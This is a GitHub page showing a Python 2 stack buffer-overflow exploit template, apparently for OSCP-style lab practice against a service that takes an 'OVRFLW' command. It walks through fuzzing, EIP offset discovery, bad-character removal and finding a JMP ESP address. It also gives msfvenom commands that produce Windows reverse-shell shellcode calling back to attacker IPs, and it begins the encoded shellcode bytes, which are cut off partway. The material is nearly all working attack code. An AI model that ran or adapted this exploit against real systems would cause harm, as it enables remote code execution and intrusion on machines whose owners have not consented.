-
Notifications
You must be signed in to change notification settings - Fork 1
/
bof-template.txt
328 lines (272 loc) · 19.9 KB
/
bof-template.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
import socket
import sys
from time import sleep
# STEP 1 - UNDERSTAND WHAT A LOGIN LOOKS LIKE
# STEP 2 - PICK A LOGIN PARAMETER TO FUZZ - ADD TO THE CREATE_PAYLOAD FUNCTION
# STEP 3 - TRY TO OVERRIDE THE EIP (POINTER)
# ------ ONCE YOU CONFIRM EIP OVERRIDE ------
# STEP 4 - USE msf-pattern_create -l <length> TO CREATE A PAYLOAD FILLER
# STEP 5 - USE msf-pattern_offest -q <pattern to look for> -l <length> TO FIND WHAT LENGTH NEEDED TO OVERRIDE EIP
# STEP 6 - DETERMINE WHERE TO PLACE SHELLCODE
# STEP 7 - IDENTIFY AND REMOVE BAD CHARACTERS
# ------ ONCE BAD CHARS ARE REMOVED ------
# STEP 8 - GET AN ADDR FOR EIP - SEARCH FOR REGISTER JMP COMMANDS TO ACCESS THAT ADDRESS IN MEMORY
#GET MEMORY ADDRESS NOT PROTECTED WITH DEP, SEP, OR ASLR AND DOES NOT START WITH \X00
#---> !mona modules
#---> !mona find -s '\xff\xe4' -m 'libspp.dll'
#ASSEMBLY KEY:
# FFE1 - JMP ECX
# FFD1 - CALL ECX
# FFE4 - JMP ESP
# FFD4 - CALL ESP
# SHELL - msf-nasm-shell
# STEP 9 - GENERATE SHELLCODE WITH ENCODING
# msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.2 lport=8080 -f python -v shellcode -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x3D"
############################################################################################################
############################################################################################################
# DEFINE VARIABLES #
############################################################################################################
############################################################################################################
# TUPLE - TARGET ADDRESS AND PORT
TGT_ADDRESS = ("192.168.37.111",4455)
DEFAULT_PAYLOAD_SIZE = 2990
CURRENT_PAYLOAD_SIZE = DEFAULT_PAYLOAD_SIZE
DELAY = 10
BAD_CHARS = []
CHARACTER = "A"
HEX_CHARS = ("""\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\
\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\
\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\
\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\
\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\
\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\
\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\
\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\
\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\
\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\
\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\
\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\
\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\
\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\
\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\
\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff""")
############################################################################################################
############################################################################################################
# DEFINE FUNCTIONS #
############################################################################################################
############################################################################################################
######################################################
# HELPER FUNCTION TO REMOVE BAD CHARACTERS #
######################################################
def remove_bad_chars(byte_obj=HEX_CHARS):
temp = byte_obj
for block in BAD_CHARS:
temp = temp.replace(block, '')
#print(temp)
return temp
##########################################################################
# HELPER FUNCTION TO ROTATE CHARACTERS TO SQUEEZE FOR BAD CHAR CHECKING #
##########################################################################
def rotate(text,d,c=len(HEX_CHARS)):
Lfirst = text[0 : d]
Lsecond = text[d :]
figure = Lsecond + Lfirst #left rotation
return figure[:c]
######################################################
# HELPER FUNCTION TO SEND THE PAYLOAD #
######################################################
def send_payload (payload):
size = len(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(TGT_ADDRESS)
r = s.send(payload)
print "[*] Buffer Away! Size:", size
print "[*] Payload Size:", CURRENT_PAYLOAD_SIZE
s.close()
######################################################
# HELPER FUNCTION TO CREATE THE PAYLOAD #
######################################################
def create_payload(payload_size):
payload = ""
global CURRENT_PAYLOAD_SIZE
######################################################
# TESTING PAYLOAD SIZE TO OVERRIDE EIP
# PAYLOAD: MSF_PATTERN-CREATE
######################################################
if MSF_PATTERN is not None and MSF_OFFSET is None and PAYLOAD_BUFFER is None:
print '[*] Detected an msf pattern'
payload = MSF_PATTERN
######################################################
# TESTING TO CONFIRM OFFSET OVERRIDES EIP
# PAYLOAD: MSF_PATTERN-OFFSET
######################################################
elif MSF_OFFSET is not None and MSF_PATTERN is None and PAYLOAD_BUFFER is None:
print '[*] Detected msf offest payload'
payload = MSF_OFFSET
elif PAYLOAD_BUFFER is not None and MSF_OFFSET is None and MSF_PATTERN is None:
######################################################
# PAYLOAD SIZE TESTING
# PAYLOAD: FILLER ONLY
######################################################
print '[*] Detected a custom payload'
payload = PAYLOAD_BUFFER
else:
payload = payload_size * CHARACTER
######################################################
# ASSEMBLE FULL BUFFER
######################################################
size = len(payload)
CURRENT_PAYLOAD_SIZE = size
return payload
##################################################################################################################################################################
##################################################################################################################################################################
##################################################################################################################################################################
######################################################
# STEP 3 - OVERRIDE EIP #
######################################################
# AMOUNT TO INCREMENT PAYLOAD BY
INCREMENT = 2
DELAY = 2
CMD = "OVRFLW "
END = "\r\n"
CURRENT_PAYLOAD_SIZE = 2990
#CHARACTER = CMD + ("A" * CURRENT_PAYLOAD_SIZE) + END
#############################################################################
# STEP 4 - USE MSF PATTERN TO FIND EXACT BUFFER LENGTH WHICH OVERWROTE EIP #
#############################################################################
# MSF_PATTERN - IF NONE, IGNORED
# USAGE: msf-pattern_create -l 2990 | xclip
DEFAULT_PATTERN = None
MSF_PATTERN = DEFAULT_PATTERN
#MSF_PATTERN = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv"
#MSF_PATTERN = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv"
#MSF_PATTERN = CMD + (MSF_PATTERN * CURRENT_PAYLOAD_SIZE) + END
######################################################
# STEP 5 - CONFIRM EIP OVERRIDE #
######################################################
# MSF_PATTERN OFFSET - IF NONE, IGNORED
# USAGE: msf-pattern_offset -l 9800 -q 42306142 [*] Exact match at offset 780
DEFAULT_MSF_OFFSET = None
MSF_OFFSET = DEFAULT_MSF_OFFSET
#MSF_OFFSET = ("A" * 2080) + ("B" * 4)
FILLER = 1161 - len(CMD) - len(END)
#MSF_OFFSET = CMD + ("A" * 1161) + ("B" * 4) + END
######################################################
# STEP 6 - CHECK FOR SHELLCODE SPACE #
# AND SPACE TO CHECK BAD CHARS ~400 bytes #
######################################################
PAYLOAD_BUFFER = None
#FILLER = "A" * 2080
#FILLER = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2C"
EIP = "B" * 4
PADDING = "C" * 400
#PAYLOAD_BUFFER = FILLER + EIP + PADDING
#PAYLOAD_BUFFER = CMD + ("A" * 1161) + ("B" * 4) + PADDING
######################################################
# STEP 7 - WEED OUT BAD CHARACTERS #
######################################################
#
# RANGE OF HEX CHARACTERS
# len(hex_chars) = 255
######################################################
BAD_CHARS = ["\x00","\x04","\x67","\x96","\xB3"]
#PAYLOAD_BUFFER = FILLER + EIP +
# rotate(<characters>,<amount to shift>,<display first X chars>)
#PAYLOAD_BUFFER = FILLER + EIP + rotate(remove_bad_chars(),135*2, 135)
#PAYLOAD_BUFFER = FILLER + EIP + PADDING
#PAYLOAD_BUFFER = CMD + ("A" * 1161) + ("B" * 4) + remove_bad_chars()
######################################################
# STEP 8 - FIND A GOOD EIP ADDRESS #
# ---> !mona modules #
# ---> !mona find -s '\xff\xe4' -m 'libspp.dll' #
# ASSEMBLY KEY: #
# FFE1 - JMP ECX
# FFD1 - CALL ECX
# FFE2 - JMP EDX
# FFD2 - CALL EDX
# FFE4 - JMP ESP
# FFD4 - CALL ESP
# FFE0 - JMP EAX
# FFD0 - CALL EAX
# SHELL - msf-nasm-shell #
######################################################
# NB:
# EIP is an ADDRESS
# You can make your own JMP command (EIP has address of next address which has a JMP)
FILLER = "A" * 2080
#EXAMPLE --> EIP = "\x83\x0c\x09\x10" #0x10090C83 - !REVERSE REVERSE!
#1- JMP ESP 0x1480111E
#2- MOV EDX,EAX \x89\xC2
#3- JMP EAX \xFF\xE0
#!mona find -s '\xff\xe4' -m 'offsec_pwk_dll.dll'
EIP = "\x83\x66\x52\x56" # 0x56526683 Address points to JMP ESP
#PADDING = "\xFF\xE2" # JMP EDX
#PAYLOAD_BUFFER = FILLER + EIP + PADDING
#PAYLOAD_BUFFER = CMD + ("A" * 1161) + EIP + PADDING
######################################################
# STEP 9 - INSERT SHELLCODE #
######################################################
# MSFVENOM:
#msfvenom -p windows/shell_reverse_tcp lhost=192.168.19.37 lport=9000 -f python -v shellcode -b "\x00\x04\x67\x96\xB3"
shellcode = ""
shellcode += "\xba\x13\x36\x48\x21\xdb\xd7\xd9\x74\x24\xf4"
shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x0e"
shellcode += "\x03\x46\x38\xaa\xd4\x94\xac\xa8\x17\x64\x2d"
shellcode += "\xcd\x9e\x81\x1c\xcd\xc5\xc2\x0f\xfd\x8e\x86"
shellcode += "\xa3\x76\xc2\x32\x37\xfa\xcb\x35\xf0\xb1\x2d"
shellcode += "\x78\x01\xe9\x0e\x1b\x81\xf0\x42\xfb\xb8\x3a"
shellcode += "\x97\xfa\xfd\x27\x5a\xae\x56\x23\xc9\x5e\xd2"
shellcode += "\x79\xd2\xd5\xa8\x6c\x52\x0a\x78\x8e\x73\x9d"
shellcode += "\xf2\xc9\x53\x1c\xd6\x61\xda\x06\x3b\x4f\x94"
